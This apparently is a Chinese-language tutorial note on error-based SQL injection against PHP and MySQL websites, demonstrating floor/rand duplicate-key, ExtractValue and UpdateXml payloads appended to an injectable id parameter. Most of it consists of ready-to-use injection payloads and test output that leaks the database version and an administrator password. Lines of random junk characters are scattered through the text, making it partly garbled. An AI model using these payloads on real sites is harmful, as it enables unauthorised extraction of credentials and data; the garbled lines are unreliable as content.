放点原来的笔记。MySQL 在执行语句出错时会抛出异常信息,而 php+mysql 架构的网站往往又将错误代码直接显示在页面上,这样就可以通过构造如下三种方法,从报错信息中获取特定数据。
实际测试环境:
1 ?+ y! j" I" J- v3 ?
' h9 }1 a. A2 h3 d/ ^5 ]7 y8 b 7 `1 o! P @$ P6 c
mysql> show tables;
+----------------+
| Tables_in_test |
+----------------+
| admin |
| article |
+----------------+
5 m+ @4 \+ W8 d
7 V, A+ r% O- K6 j5 z
mysql> describe admin;
+-------+------------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+-------+------------------+------+-----+---------+----------------+
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
| user | varchar(50) | NO | | NULL | |
| pass | varchar(50) | NO | | NULL | |
+-------+------------------+------+-----+---------+----------------+
5 \- F" }/ W$ |% \) a; ?+ X % V6 h6 f$ ^' q$ @* ^$ \$ E+ O4 ^
$ C- z" ?- j3 J
mysql> describe article;
+---------+------------------+------+-----+---------+----------------+
| Field | Type | Null | Key | Default | Extra |
+---------+------------------+------+-----+---------+----------------+
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
| title | varchar(50) | NO | | NULL | |
| content | varchar(50) | NO | | NULL | |
+---------+------------------+------+-----+---------+----------------+
1、通过floor报错
可以通过如下一些利用代码:
; v5 P/ c, a6 R
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x
from information_schema.tables group by x)a);
6 p+ T& V4 e" D6 C: v 5 ?$ B; P% {( |4 s* C, T" N* J
and (select count(*) from (select 1 union select null union select !1)x
group by concat((select table_name from information_schema.tables limit 1),
floor(rand(0)*2)));
举例如下:
首先进行正常查询:
mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
| 1 | test | do it |
+----+-------+---------+
假如id输入存在注入的话,可以通过如下语句进行报错。
2 w9 l5 P# h0 ?$ P, y2 i
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'
可以看到成功爆出了MySQL的版本。如果需要查询其他数据,可以通过修改version()所在位置的语句进行查询。
例如我们需要查询管理员用户名和密码:
Method1:
. ~8 V5 H/ u4 @" {+ s" A
mysql> select * from article where id = 1 and (select 1 from
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x
from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
Method2:
; [1 V. `/ K% f! Y, y& H4 ~
mysql> select * from article where id = 1 and (select count(*)
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),
floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
2、ExtractValue
测试语句如下
& q1 W! t+ B: g/ P f" j) c- O! \
" v3 O5 m x+ E; [* `5 i; Z( f/ P8 ]
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));
实际测试过程
( {- Z( s& t, q4 `# G# d
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
(select pass from admin limit 1)));--
ERROR 1105 (HY000): XPATH syntax error: '\admin888'
3、UpdateXml
测试语句
' H- z. n- [" y$ J$ J4 t
; Q* ~4 _6 C% \; y2 k- z 8 u, ^ u3 p# e. b. v( d
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))
实际测试过程
$ b9 m2 h3 h/ j/ v0 }/ Q / F% X$ T2 |6 H4 D3 U2 R G
) s9 L3 U, \$ X- @
mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,
(select pass from admin limit 1),0x5e24),1));
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'
That's all, thanks to the foreign guys.
# B) }; U4 |2 `. e$ L8 q I) S. \3 J) N/ M
|